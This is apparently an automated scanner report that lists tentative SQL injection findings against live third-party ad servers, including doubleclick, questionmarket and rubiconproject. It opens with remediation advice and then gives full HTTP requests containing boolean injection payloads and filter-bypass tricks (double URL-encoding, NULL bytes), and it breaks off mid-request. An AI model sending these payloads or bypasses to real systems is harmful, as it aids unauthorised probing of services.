SQL Injection, PoC, Example, XSS, CWE-79, CAPEC-86, Cross Site Scripting, DORK, Unforgivable Vulnerabilities

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [TargetID parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The TargetID parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the TargetID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935'%20and%201%3d1--%20&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5679

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_MobilePro_GetA500AppleGiftCard_300x250_072010.swf";
var gif = "http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&SC=S056001&ch_id=D&s_id=MSN&c_id=GFTCRD&o_id=GFTCRD");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctV
...[SNIP]...

Request 2

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935'%20and%201%3d2--%20&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_Laser_TradeFreeFor60DaysGet500_300x250_100110.swf";
var gif = "http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 10;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/2
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N3973.MSN/B4412732.159

Issue detail

The PG parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PG parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PG request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3%2527&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6381

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3%2527%2527&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 699

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2A
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N3973.MSN/B4412732.159

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!%00'&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6398
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:59 GMT
Expires: Sun, 30 Jan 2011 14:48:59 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!%00''&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 711
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:59 GMT
Expires: Sun, 30 Jan 2011 14:48:59 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2A
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The &PID parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the &PID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6634

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Options-Screener_300x250.swf";
var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU";
ctp[1] = "clickTag1";
ctv[1] = "http://www.theocc.com/about/publications/character-risks.jsp";

var fv='"m
...[SNIP]...

Request 2

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6466

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_ETFHQ-Pricing_300x250.swf";
var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex =
...[SNIP]...

1.5. http://amch.questionmarket.com/adsc/d852149/4/864449/decide.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d852149/4/864449/decide.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /adsc/d852149/4%00'/864449/decide.php?&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:27:37 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1059

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d852149/4%00''/864449/decide.php?&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:30:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d852149/4 was not found on this server.</p>
<hr
...[SNIP]...

1.6. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://assets.rubiconproject.com
Path:	/static/rtb/sync-min.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11180680'%20or%201%3d1--%20 and 11180680'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html11180680'%20or%201%3d1--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
